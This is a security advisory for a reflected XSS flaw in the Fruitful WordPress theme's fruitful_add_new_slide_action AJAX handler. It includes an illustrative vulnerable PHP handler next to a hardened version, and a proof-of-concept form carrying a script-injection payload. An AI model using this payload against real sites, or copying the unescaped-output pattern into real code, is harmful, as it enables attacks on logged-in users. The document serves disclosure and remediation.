Fruitful [Reflected XSS]
Description
The Fruitful theme is vulnerable to a reflected XSS attack through the AJAX action fruitful_add_new_slide_action. This action outputs the contents of the variable $_POST['data'] without proper escaping, allowing an attacker to craft a malicious request and execute JavaScript code in the victim's browser.
Because this action is a privileged one, it requires a registered and logged-in user to work.
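To illustrate the bug class described above, the following is an added example and not the theme's actual code: a minimal admin-ajax handler that reflects $_POST['data'] into an HTML attribute unescaped, beside a hardened version that verifies a nonce, checks a capability and escapes on output. The nonce name and the helper function names (other than fruitful_add_new_slide_action) are assumptions.

```php
<?php
// Added illustration, not the Fruitful theme's own code. The vulnerable handler
// reflects the raw POST parameter into an attribute, which is what a payload such
// as the PoC's "><script>... breaks out of.
function fruitful_add_new_slide_action_vulnerable() {
    $data = $_POST['data'];                       // unvalidated, unescaped input
    echo '<input type="text" name="slide_title" value="' . $data . '">';
    wp_die();
}

// Hardened handler (assumed fix, not the vendor's patch):
//  1. check_ajax_referer() rejects requests that do not carry a valid nonce,
//     so a third-party page cannot forge the request for a logged-in victim;
//  2. current_user_can() enforces the privilege the action is supposed to need;
//  3. esc_attr() escapes for the attribute context the value lands in, which is
//     the actual XSS fix; sanitize_text_field() additionally strips tags and
//     control characters from the stored value.
function fruitful_add_new_slide_action_fixed() {
    check_ajax_referer( 'fruitful_add_slide', 'nonce' );   // nonce name is an assumption
    if ( ! current_user_can( 'edit_theme_options' ) ) {
        wp_send_json_error( 'insufficient permissions', 403 );
    }
    $data = isset( $_POST['data'] )
        ? sanitize_text_field( wp_unslash( $_POST['data'] ) )
        : '';
    echo '<input type="text" name="slide_title" value="' . esc_attr( $data ) . '">';
    wp_die();
}
add_action( 'wp_ajax_fruitful_add_new_slide_action', 'fruitful_add_new_slide_action_fixed' );
```

With the hardened handler, the PoC form's value is rendered as literal text inside the attribute (quotes and angle brackets become HTML entities) instead of closing the attribute and starting a script tag.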
PoC
Use a logged-in user to submit this form:
<form action="http://example.com/wp-admin/admin-ajax.php" method="post">
<input type="hidden" name="action" value="fruitful_add_new_slide_action">
<input type="hidden" name="data" value='"><script>alert(1)</script> <!--'>
<input type="submit" value="Click Me!">
</form>
INFO
- Date: 3 June 2016
- Author: Pan Vag
- Reference: github.com
- Software: Fruitful
- Version: 3.3.1
- Tested on: WordPress 4.5.2
- ID: DWF-2016-87054